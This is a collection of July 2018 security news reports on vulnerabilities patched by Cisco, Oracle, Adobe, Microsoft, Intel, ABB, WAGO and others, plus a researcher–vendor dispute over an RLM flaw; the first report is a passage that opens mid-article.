The access to the Policy Builder interface could allow an attacker to change to existing repositories and create new ones, while the access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also allow an attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned of the presence of the Cluster Manager in Policy Suite of a root account with default and static credentials. A remote attacker can exploit the vulnerabilities to access to the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution, one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.


Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs
Vulnerebility

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed obtaining a significant reduction of vulnerable code libraries on the platform.

Github alerts warn developers when including certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced to add the support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. Github notified affected users by December 1, more than 450,000 of the vulnerabilities were addressed either by updating the affected library or removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With the support of a Python language, developers will have the opportunity to receive alerts also for their code written in this powerful programming language.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories the maintainers need to opt into security alerts, or by giving the dependency graph access to the repo from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allow access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”


Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek 
Vulnerebility

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. The security bugs can be exploited for arbitrary code execution by getting the targeted user to open specially crafted ARF or WRF files using the affected player.

None of the vulnerabilities patched this week appear to have been exploited for malicious purposes.


ABB to Patch Code Execution Flaw in HMI Tool
19.7.2018 securityweek 
Vulnerebility

Swiss industrial tech company ABB is working on a patch for a serious arbitrary code execution vulnerability affecting one of its engineering tools.

The security hole, tracked as CVE-2018-10616, impacts all versions of Panel Builder 800. ABB’s Panel 800 devices provide operator panels for process automation systems, and the Panel Builder is an engineering tool for the process panels included in the product suite. According to ICS-CERT, which published an advisory this week, the tool is used worldwide in the chemical, critical manufacturing, dams, energy, water, and food and agriculture sectors.ABB Panel Builder 800 vulnerabilities

Researchers discovered that the HMI tool, specifically its file parser component, is affected by a high severity improper input validation flaw that can allow an attacker to run arbitrary code on the device hosting the affected utility.

A remote attacker can exploit the vulnerability for arbitrary code execution by tricking a local user into opening a specially crafted file. The weakness cannot be exploited without user interaction, ABB pointed out.

The vendor says it’s working on a patch. In the meantime, it has advised customers to ensure that their employees are aware of the threat posed by opening malicious files with the Panel Builder tool, to scan files transferred between devices, and avoid giving users more permissions than required for their job.

ABB Panel Builder 800 vulnerabilities

ABB says it’s not aware of any malicious exploits targeting this vulnerability and details of the security hole have not been publicly disclosed.

The vulnerability was reported to ABB by Michael DePlante of the Leahy Center for Digital Investigation at Champlain College and Michael Flanders of Trend Micro, both working with the Zero Day Initiative (ZDI).

ZDI lists over 30 upcoming advisories for vulnerabilities discovered by DePlante and Flanders in ABB products, and a majority have been assigned CVSS scores of 9.3, which puts them in the critical severity category. While there are more than 30 advisories, ZDI often publishes a separate advisory for each variation of a flaw, but vendors typically view them as a single issue and only one CVE identifier gets assigned to them.


Vulnerability or Not? Pen Tester Quarrels With Software Maker
19.7.2018 securityweek 
Vulnerebility

Security Industry Battles Over Testing Methods

Researcher Publishes PoC; Vendor Says it's Not a Vulnerability

A SpiderLabs security researcher has published details of what he considers to be a vulnerability in the RLM web application provided by Reprise Software. Reprise CEO Matt Christiano has told SecurityWeek, it is not a vulnerability.

RLM is the Reprise License Manager, described by Reprise as "a flexible and easy-to-use license manager with the power to serve enterprise users." The researcher is Adrian Pruteanu, security consultant with SpiderLabs at Trustwave.

During a penetration engagement, Pruteanu writes, "I was able to identify a critical vulnerability which allowed me to execute code on the server, eventually leading to full domain compromise. Regrettably, despite my best efforts, the vendor has refused to issue patches as they do not believe these findings to be vulnerabilities."

Christiano responded, "The issue described in the [SpiderLabs] article is certainly not a vulnerability, it is misuse of the product."

Pruteanu claims RLM allows users (and attackers) to read and write data to any file on disk provided RLM has access to it. By default, RLM's web server running on port 5054, does not require authentication. This allows an attacker to write malware to the user startup folder without administrator access and even if RLM.exe is running under a low-privilege user. If RLM.exe is privileged, the malware can be written to the All Users Startup folder.

Christiano retorts, "RLM does not require elevated permissions to perform any operation, and is designed to be run in a segregated, non-privileged account. To install the program as root/administrator is simply negligent. This is clearly documented."

Christiano goes on to state that port 5054 was assigned to RLM by IANA in 2008. Furthermore, he adds, "License server machines are rarely internet-facing, and when they are, port 5054 is not required for operation, and should not be enabled thru the company's firewall."

The researcher provides a full proof of concept (PoC) for his 'vulnerability'. He also located a cross-site scripting (reflected) vulnerability in the lf parameter of the /goform/edit_lf_get_data URL in RLM's web interface. RLM does not enforce POST for this URL and the payload can also be passed with a GET request.

What worries the researcher even more than the vulnerabilities themselves (vulnerabilities can be fixed through responsible disclosure) has been the vendor's support staff response to the disclosure. Pruteanu reports, "During our email correspondence the general theme could be wrapped up in the following quotes: 'We tell end users not to run the rlm server (which implements the web server) in privileged mode. There is no reason it needs to run with elevated privileges'."

Pruteanu's response is that users typically ignore best practices and leave pre-existing defaults untouched.

Reprise support continued, "We do not consider this a vulnerability, any more than vi or notepad are vulnerabilities. Of course, NO ONE should run the servers as root/administrator; if they do, they deserve what they get. They can, also, disable the web interface, or, if they want to run it, they can enable logins for it. So there are plenty of opportunities for an admin to prevent any file writing."

Christiano expanded on his support staff comments. He clearly sees the issue as user or installer security misconfiguration (#6 in OWASP's current Top Ten Web Application Risks) rather than a vulnerability. "SpiderLabs refused to identify the 'customer' with this 'problem', denying us the opportunity to review our ISV's installation procedures and correct them," he said.

Of course, SpiderLabs is almost certainly enjoined by customer NDAs not to mention it by name. "One could argue," continued Christiano, "that SpiderLabs cares less about solving the problem than they do about creating sensational headlines to generate more business. I am not arguing that, but one could."

The timeline for the researcher's attempted responsible disclosure is short and limited. Over the course of just 13 days in May 2018, the researcher claims that he disclosed the vulnerabilities; the vendor, he says, refused to accept they are vulnerabilities and refused to patch; the researcher encouraged the vendor to reconsider; and the vendor chose to discontinue communication. There was no route to escalate the issue beyond the support person; and Pruteanu feels he had no alternative but to go to public disclosure.

But Christiano refutes this. "We did correspond with SpiderLabs thru June 2018 (not May)," he told SecurityWeek, "and described the situation to them; we received no further reply from them until they provided you with this misleading information."

"The biggest problem we run into during the disclosure process," comments Pruteanu "is getting the disclosure in front of the correct audience. Even though these vendors are basically getting a free audit that helps them secure their products for their customers, we are often met with hostility simply because they are unsure how to handle the report. If you don't have the capability to support this process in house there are third party options like Bugcrowd."

Christiano replies, "It is not at all clear how [SpiderLabs] did their testing, or how the software was installed. Clearly, it was installed incorrectly. Finally, Reprise has never refused to address any security vulnerability in any of our products."

It comes down to whether 'allowing' misconfiguration is in itself a vulnerability. Pruteanu believes it is. Christiano believes it is not, and that software installers have a responsibility to configure applications in the way intended and advised.

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.


Siemens Informs Customers of New Meltdown, Spectre Variants
19.7.2018 securityweek 
Vulnerebility

Siemens recently updated its security bulletin for the Meltdown and Spectre vulnerabilities to inform customers of the latest variants, specifically the ones known as LazyFP and Spectre 1.1.

Several industrial control systems (ICS) vendors published security advisories for the CPU flaws shortly after they were disclosed in early January. Siemens published a bulletin on speculative side-channel vulnerabilities on January 11.

In late May, the company updated its bulletin to include information about Variant 3a and Variant 4, which are also known as Spectre-NG. On Tuesday, Siemens once again updated the security bulletin to describe the variants known as LazyFP, a medium severity Meltdown-like flaw disclosed in mid-June and tracked as CVE-2018-3665, and Spectre 1.1, disclosed earlier this month and tracked as CVE-2017-5753.

LazyFP is related to the floating point unit (FPU), also known as the math coprocessor. Researchers discovered that if certain conditions are met an attacker may be able to access FPU state data, which can contain sensitive information, such as cryptographic keys.

Spectre 1.1, described as a bounds check bypass store (BCBS) issue, was disclosed along with Spectre 1.2. Intel awarded $100,000 to the researchers who identified these variants.

While LazyFP and Spectre 1.1 are related to the original Meltdown and Spectre vulnerabilities, CPU and operating system vendors are not as concerned about their impact.

Register for SecurityWeek’s 2018 ICS Cyber Security Conference

Siemens has advised customers to keep an eye out for software and firmware updates provided for operating systems and processors, but warned that some of these updates “can result in compatibility, performance or stability issues.”

The German industrial giant continues to analyze the impact of these vulnerabilities on its products.

In the case of the original Meltdown and Spectre flaws, they have been found to impact many Siemens products, including SIMATIC, RUGGEDCOM, SIMOTION, SINEMA and SINUMERIK devices. The company has released both software and BIOS updates, along with workarounds and mitigations.


Oracle Patches Record 334 Vulnerabilities in July 2018
19.7.2018 securityweek 
Vulnerebility

Oracle Patches Over 200 Remotely Exploitable Vulnerabilities in July 2018 Critical Patch Update

Oracle this week released its July 2018 set of patches to address a total of 334 security vulnerabilities, the largest number of flaws resolved with a Critical Patch Update (CPU) to date. Over 200 of the bugs may be remotely exploitable without authentication.

This month, 23 products from the enterprise security giant were patched, including E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft Products, Retail Applications, Siebel CRM, and the Sun Systems Products Suite.

More than 50 of the flaws addressed this month had a CVSS 3.0 Base Score of 9.8. Overall, 61 security bugs had a CVSS score of 9.0 or above, according to Oracle’s advisory.

A total of 203 vulnerabilities were patched in business-critical applications, around 65% of which could be exploited remotely without entering credentials, ERPScan, a company that specializes in securing Oracle and SAP applications, points out.

This month, Financial Services Applications received the largest number of fixes, at 56. 21 of these vulnerabilities may be remotely exploitable without authentication.

Fusion Middleware received the second largest number of patches, at 44, with 38 of the addressed issues remotely exploitable without authentication.

Next in line are Retail Applications at 31 fixes (26 flaws being remotely exploitable) and MySQL, also with 31 patches (only 7 bugs remotely exploitable), followed by Hospitality Applications with 24 fixes (7 issues remotely exploitable), Sun Systems Products Suite at 22 patches (10 flaws remotely exploitable), and Enterprise Manager Products Suite with 16 fixes (all remotely exploitable without authentication).

Oracle also addressed vulnerabilities in PeopleSoft Products (15 bugs – 11 remotely exploitable without authentication), E-Business Suite (14 flaws – 13 remotely exploitable), Communications Applications (14 – 10), Virtualization (12 – 2), Construction and Engineering Suite (11 – 6), JD Edwards Products (10 – 9), Java SE (8 – 8), and Supply Chain Products Suite (8 – 6).

“On the surface, the downward trend of Java SE patches would appear to be positive,” Apostolos Giannakidis, Security Architect at Waratek, told SecurityWeek. “However, several actions taken to fix Java SE vulnerabilities in the July CPU are likely to break the functionality of certain applications. Application owners who apply binary patches should be extremely cautious and thoroughly test their applications before putting patches into production.”

"The fix for the most critical Java SE vulnerability in the July CPU - CVE-2018-2938 - removes the vulnerable component (Java DB) from the JDK," Waratek explained in a guidance note sent to SecurityWeek Wednesday. "Users that depend on this component must manually obtain the latest Apache Derby artifacts and rebuild their applications."

The least impacted products include Utilities Applications (4 vulnerabilities – 3 remotely exploitable without authentication), Policy Automation (3 flaws – all remotely exploitable), and Database Server (3 – 1).

All of the vulnerabilities impacting Hyperion (2 bugs), Insurance Applications (2), Global Lifecycle Management (1), iLearning (1), Siebel CRM (1), and Support Tools (1) may be exploited remotely without authentication.

Some of the most important issues addressed this month could be exploited remotely to take over the impacted application: CVE-2017-15095 in Oracle Spatial, CVE-2018-7489 in Global Lifecycle Management OPatchAuto component, CVE-2018-2943 in Fusion Middleware MapViewer, CVE-2018-2894 in WebLogic Server, and CVE-2017-5645 in PeopleSoft Enterprise FIN Install.

In late June, Oracle announced the availability of patches for new variants of the speculative execution attack methods known as Meltdown and Spectre. The company released the first set of mitigations against Spectre and Meltdown as part of the January 2018 CPU.

All Oracle customers are advised to apply the fixes included in Oracle’s Critical Patch Updates without delay, as some of the addressed vulnerabilities are being targeted by malicious actors in live attacks.

“Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches,” the company notes.


Cisco Patches High Risk Flaws in StarOS, IP Phone
18.7.2018 securityweek 
Vulnerebility

Cisco this week released a set of security patches to address several vulnerabilities in its products, including High risk issues impacting StarOS and 6800, 7800, and 8800 Series IP Phones.

The first High severity bug (CVE-2018-0369) impacts the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms. By abusing this security flaw, an unauthenticated remote attacker could trigger a reload of the npusim process, thus causing denial of service (DoS).

An attacker could trigger the simultaneous reload of all four instances of the npusim process that are running per Service Function (SF) instance.

According to Cisco, the vulnerability resides in the improper handling of fragmented IPv4 packets containing options. Thus, an attacker could exploit the issue by sending a malicious IPv4 packet across an affected device.

“An exploit could allow the attacker to trigger a restart of the npusim process, which will result in all traffic queued toward this instance of the npusim process to be dropped while the process is restarting. The npusim process typically restarts within less than a second,” Cisco explains in an advisory.

Impacted products include Cisco Virtualized Packet Core-Single Instance (VPC-SI), Cisco Virtualized Packet Core-Distributed Instance (VPC-DI), and Cisco Ultra Packet Core (UPC) running StarOS operating system releases prior to the fixed version.

The second High risk flaw (CVE-2018-0341) addressed this week impacts the web-based UI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware and could be exploited by an authenticated, remote attacker for command injection.

“The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including arbitrary shell commands in a specific user input field,” Cisco says.

In addition to these two bugs, Cisco addressed six Medium severity issues in Web Security Appliance (WSA), FireSIGHT System Software, Firepower System Software, and Digital Network Architecture (DNA).

Exploitation of these vulnerabilities could result in denial of service, bypass of file policy, bypass of URL-based access control policy, and cross-site scripting (XSS) attacks, Cisco’s advisories reveal.


Over 100 Vulnerabilities Patched in Adobe Acrobat, Reader
18.7.2018 securityweek 
Vulnerebility

Adobe on Tuesday released security updates that patch 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

The latest versions of Acrobat and Reader for Windows and macOS address tens of critical memory corruption bugs that can allow remote code execution, including double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error issues.

The list of weaknesses fixed with this month’s Patch Tuesday updates also includes a critical privilege escalation and tens of important out-of-bounds read issues that lead to information disclosure.

Over two dozen researchers have been credited for responsibly disclosing these flaws to Adobe. Many of the security holes were reported to the vendor through Trend Micro’s Zero-Day Initiative (ZDI).

In the case of Flash Player, version 30.0.0.134 resolves a critical type confusion issue that can lead to code execution and a flaw rated important that can result in information disclosure.

Hotfixes released by Adobe for Experience Manager patch three server-side request forgery (SSRF) vulnerabilities that can lead to the exposure of sensitive information, but none of the flaws are considered critical.

Finally, updates released for Adobe Connect fix authentication bypass and insecure library loading flaws that have been assigned medium and important severity ratings.

Adobe says it’s not aware of any malicious exploitation attempts for the vulnerabilities patched with this round of updates and the company does not expect to see attacks leveraging these flaws any time soon.


Microsoft Patch Tuesday Updates Fix Over 50 Vulnerabilities
18.7.2018 securityweek 
Vulnerebility

Microsoft’s Patch Tuesday updates for July 2018 address more than 50 vulnerabilities, but none of them appear to have been exploited for malicious purposes before the fixes were released.

The company has classified 18 of the flaws as critical and, similar to previous months, they mostly affect the Edge and Internet Explorer web browsers. Many of these security holes have been described as memory corruption bugs that allow remote code execution.

Three of the flaws patched this month were publicly disclosed before Microsoft released patches. The list includes CVE-2018-8278, a spoofing vulnerability affecting Edge; and CVE-2018-8314 and CVE-2018-8313, both of which are Windows privilege escalation vulnerabilities.

Trend Micro’s Zero Day Initiative (ZDI) has highlighted some of the more interesting flaws patched this month. One of them is a low severity Office tampering issue that can be exploited by getting the targeted user to open a specially crafted file.

“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email. Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters. That’s likely the reason Microsoft chose to go ahead and release a patch for this Low-rated vulnerability,” ZDI explained in a blog post.

Another interesting vulnerability that is not very serious affects the Microsoft Wireless Display Adapter (MWDA). The flaw allows an authenticated attacker to execute arbitrary commands, but what makes the issue interesting is the fact that a firmware update is required to address it.

“To get the new firmware, it has to be downloaded from the Wireless Display Adapter App available in the Microsoft App Store. That doesn’t sound like something easily automated. From a sysadmin’s perspective, this patch will be very labor intensive to roll out,” ZDI said.

Microsoft also made some updates to advisories describing the Spectre and Meltdown vulnerabilities, including to inform users of a new Spectre variant.

Adobe’s Patch Tuesday updates resolve more than 100 vulnerabilities in Acrobat and Reader, including tens of critical memory corruption bugs that can allow remote code execution. The company has also released security updates for Flash Player, Experience Manager, and Connect.


CredSSP Flaw Exposes Pepperl+Fuchs HMI Devices to Attacks
18.7.2018 securityweek  Attack 
Vulnerebility

A vulnerability in the Credential Security Support Provider (CredSSP) authentication protocol has been found to impact several human-machine interface (HMI) products from Germany-based industrial automation firm Pepperl+Fuchs.

The flaw, tracked as CVE-2018-0886, affects all supported versions of Windows and it was fixed by Microsoft with its March 2018 Patch Tuesday updates.

The vulnerability was discovered by security firm Preempt, which has classified it as critical, but Microsoft, which believes exploitation is “less likely,” has assigned it only an “important” severity rating.

CredSSP processes authentication requests for applications such as the Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM). A man-in-the-middle (MitM) attacker can exploit this vulnerability to remotely execute arbitrary code and move laterally within the targeted organization’s network.

Microsoft says any application using CredSSP for authentication could be vulnerable to this type of attack.

According to an advisory published by Germany’s CERT@VDE, an organization that focuses on industrial cybersecurity, CVE-2018-0886 affects Pepperl+Fuchs’ VisuNet RM, VisuNet PC, and Box Thin Client BTC human-machine interface products.

“A successful vulnerability exploitation enables an attacker to execute arbitrary code and get access to sensitive data, e.g. passwords of the compromised system. The vulnerability allows the attacker to intercept the initial RDP connection between a client and a remote-server. Then an attacker can relay user credentials to a target system and thus get complete Man in the Middle control over a session. A stolen session can be abused to run arbitrary code or commands on the target server on behalf of the user,” CERT@VDE said in its advisory.

Pepperl+Fuchs has advised owners of devices running RM Shell 4 and RM Shell 5 HMI software to install the security patches provided by the company. Users of devices running Windows 7 or Windows 10 can patch the vulnerability by updating Windows.

The advisory from CERT@VDE says Preempt reported the vulnerabilities to Pepperl+Fuchs, but the security firm told SecurityWeek that it did not explicitly reach out to any ICS vendor.

“CredSSP is a broadly used protocol and we worked with Microsoft, since it was in their software that we found these vulnerabilities,” said Ajit Sancheti, co-founder and CEO at Preempt. “It is quite likely that Pepperl+Fuchs uses the MSFT version and hence may have been informed by them.”

Products from other ICS vendors are likely also affected by the CredSSP vulnerability, but to date no other company has published security advisories.


Hackers Can Chain Multiple Flaws to Attack WAGO HMI Devices
18.7.2018 securityweek 
Vulnerebility

Germany-based industrial automation company WAGO has patched several vulnerabilities in its e!DISPLAY 7300T Web Panel human-machine interface (HMI) products that can be chained to take control of affected devices.

The security holes, discovered by researchers at security consultancy SEC Consult and rated “high severity,” include multiple reflected and one stored cross-site scripting (XSS) vulnerabilities (CVE-2018-12981), unrestricted file upload and file path manipulation issues (CVE-2018-12980), and an incorrect default permissions flaw (CVE-2018-12979).

The reflected XSS flaws allow an unauthenticated attacker to execute arbitrary scripts in the context of the victim and hijack their session by getting them to click on a specially crafted link. The stored XSS can only be exploited by an authenticated hacker, but it does not require the targeted user to click on a link. Instead, the malicious code is triggered when the victim visits the “PLC List” page in the web interface.WAGO HMI vulnerabilities

The unrestricted file upload vulnerability allows an attacker to upload arbitrary files, but not directly to the root as the web service does not run as a privileged user. On the other hand, the incorrect default permissions weakness does allow a file in the web root, specifically index.html, to be overwritten by the unprivileged “www” user.

Combining these flaws allows an attacker to upload a shell by overwriting index.html and execute arbitrary commands with the privileges of the “www” user.

“HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction,” SEC Consult explained. “As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code.”

WAGO HMI vulnerabilities

The vulnerabilities impact e!DISPLAY 7300T Web Panel models 762-3000, 762-3001, 762-3002 and 762-3003 running firmware version 01. The issues have been patched by the vendor with the release of firmware version 02.

In addition to installing the latest firmware, WAGO has advised customers to restrict network access to the device and avoid connecting it directly to the Internet, restrict the number of users who can access the system, change default passwords, and avoid clicking on links from untrusted sources.

Advisories describing these vulnerabilities have been published by SEC Consult, VDE@CERT, which coordinated the disclosure of the flaws, and WAGO.

This was not the first time SEC Consult identified vulnerabilities in WAGO products. Last year, the company reported finding a potentially serious vulnerability that could give a remote attacker access to an organization’s entire network.


Intel Patches Security Flaws in Processor Diagnostic Tool
12.7.2018 securityweek 
Vulnerebility

Intel has updated its Processor Diagnostic Tool to address vulnerabilities that could lead to arbitrary code execution and escalation of privileges.

The Intel Processor Diagnostic Tool (IPDT) is a piece of software designed to verify the functionality of an Intel processor. It can check for brand identification and operating frequency, test specific features, and perform a stress test on the processor.

The recently addressed vulnerabilities (two of which are tracked as CVE-2018-3667 and CVE-2018-3668) were found by Stephan Kanthak and affect the IPDT releases up to v4.1.0.24, Intel reveals.

Kanthak says he found a total of four vulnerabilities in the executable installers of Intel’s tool, three of which would lead to arbitrary code execution with escalation of privilege, and a fourth that could lead to denial of service.

The security flaws can be exploited in standard Windows installations where a user UAC-protected administrator account that is created during Windows setup is used, without elevation.

“This precondition holds for the majority of Windows installations: according to Microsoft's own security intelligence reports <https://www.microsoft.com/security/sir>, about 1/2 to 3/4 of the about 600 million Windows installations which send telemetry data have only ONE active user account,” Kanthak points out.

The issue is that the IPDT installer creates three files with improper permissions, thus opening the door to said vulnerabilities.

One issue was that the installer created a randomly named folder in the %TEMP% directory, copied itself into it, and then executed the copy. Because the folder and the copy inherit the NTFS access control list from %TEMP%, once execution of files from that directory is denied, the installer would fail to execute.

Another issue was that the copy of the executable self-extractor would run with administrative privileges, but the extracted payloads (the installers setup.exe and setup64.exe, and the batch script setup.bat) are dropped unprotected into the user's %TEMP% directory. The copy would also change directory to %TEMP% and execute the batch script %TEMP%\setup.bat.

“The extracted files inherit the NTFS ACLs from their parent %TEMP%, allowing ‘full access’ for the unprivileged (owning) user, who can replace/overwrite the files between their creation and execution. Since the files are executed with administrative privileges, this vulnerability results in arbitrary code execution with escalation of privilege,” the researcher notes.

Because setup.bat calls setup.exe and setup64.exe without a path, the command processor starts searching for the files via %PATH% as it does not find them in the current working directory.

In Windows Vista and newer, however, it is possible to remove the current working directory from the executable search path and an unprivileged user, who is in full control of %PATH%, can replace the two files with rogue ones in an arbitrary directory they add to %PATH%, which results in arbitrary code execution with escalation of privilege.

The researcher also discovered that the two setup executables also load multiple Windows system DLLs from their "application directory" in the %TEMP% folder, instead of using those in Windows' "system directory."

“An unprivileged attacker running in the same user account can copy rogue DLLs into %TEMP%; these are loaded and their DllMain() routine executed with administrative privileges, once more resulting in arbitrary code execution with escalation of privilege,” the researcher points out.

The issues were reported to Intel in May and the company updated the installer the same month, but information on the vulnerabilities was not released until last week. Intel Processor Diagnostic Tool v4.1.0.27 resolves all of the above issues.


Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices

11.7.2018 securityaffairs Vulnerebility

Advanced Digital Broadcast has rolled out security patched to fix three critical vulnerabilities in Its Broadband gear.
Advanced Digital Broadcast has released patches for three critical vulnerabilities affecting broadband gateways. All the ADB Broadband Gateways and Routers based on Epicentro platform are affected by the vulnerabilities.

The flaws were discovered nearly two years ago, they are a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.

The Advanced Digital Broadcast manufactures routers and network devices dozens of broadband and telco firms.

The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.

The company started rolling out the patches in July 2017.

Advanced Digital Broadcast

Let’s see in detail the three flaws:

The CVE-2018-13108 flaw is a local root jailbreak flaw that can be exploited leveraging a network file sharing vulnerability.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”

Experts explained that the “network file sharing” feature of ADB broadband devices via USB leverages a Samba daemon to access be USB devices. The access has the highest access rights and exports the network shares with root user permissions. Attackers can abuse the Samba daemon that runs in the background to access the USB port.

The CVE-2018-13109 authorization bypass vulnerability that affects some versions of firmware used in ADB broadband devices. The flaw could be exploited by an attacker to gain access to the device settings within the web interface otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”

The CVE-2018-13110 privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.

“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”

ADB has released an updated firmware that addresses the flaws.


Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs
Vulnerebility

Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
Adobe on Tuesday has released July Patch Tuesday security updates that addressed more than 100 flaws in its products, including 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.

Windows and macOS versions of Adobe Acrobat and Reader were affected by tens of critical memory corruption bugs that could be exploited by an attacker for remote code execution. The list of flaws includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The July Patch Tuesday security updates also addressed a critical privilege escalation and tens of important out-of-bounds read vulnerabilities.

Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 30.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.

